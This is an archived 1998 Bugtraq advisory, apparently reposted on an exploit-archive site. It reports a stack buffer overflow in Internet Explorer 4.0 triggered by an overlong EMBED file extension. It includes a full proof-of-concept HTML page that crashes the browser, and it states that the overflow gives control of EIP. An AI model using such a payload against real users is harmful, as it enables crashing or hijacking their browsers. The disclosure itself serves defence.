Another MSIE 4.0 overflow
| Description: | Standard overflow, this one can almost certainly be exploited by a malicious page to run arbitrary code on a user's system. |
| Author: | Georgi Guninski <guninski@hotmail.com> |
| Compromise: | Run arbitrary code on the machines of Windows users connecting to your web page. |
| Vulnerable Systems: | Windows 95/NT running MSIE 4.0. Perhaps even the Solaris version is vulnerable, though I've never seen anyone run it. |
| Date: | 20 March 1998 |
Date: Fri, 20 Mar 1998 12:09:46 +0200
From: Georgi Guninski <guninski@hotmail.com>
To: BUGTRAQ@NETSPACE.ORG
Subject: MSIE buffer overrun
Microsoft Internet Explorer 4.0 (don't know for other versions)
can be crashed and eventually made execute arbitrary code
with a little help of the <EMBED> tag.
The following:
<EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
opens a dialog box and closes IE 4.0.
It seems that the long file extension causes stack overrun.
The stack is smashed - full with our values, EIP is also ours and CS=SS.
So probably a string could be constructed, executing code at the
client's machine.
Solution: Do not browse hostile pages.
To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711
-----------------------cut here and save as
crashmsie.html---------------------
<HTML>
Trying to crash IE 4.0
<EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
40
80 160 170 180 190 200
</HTML>
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
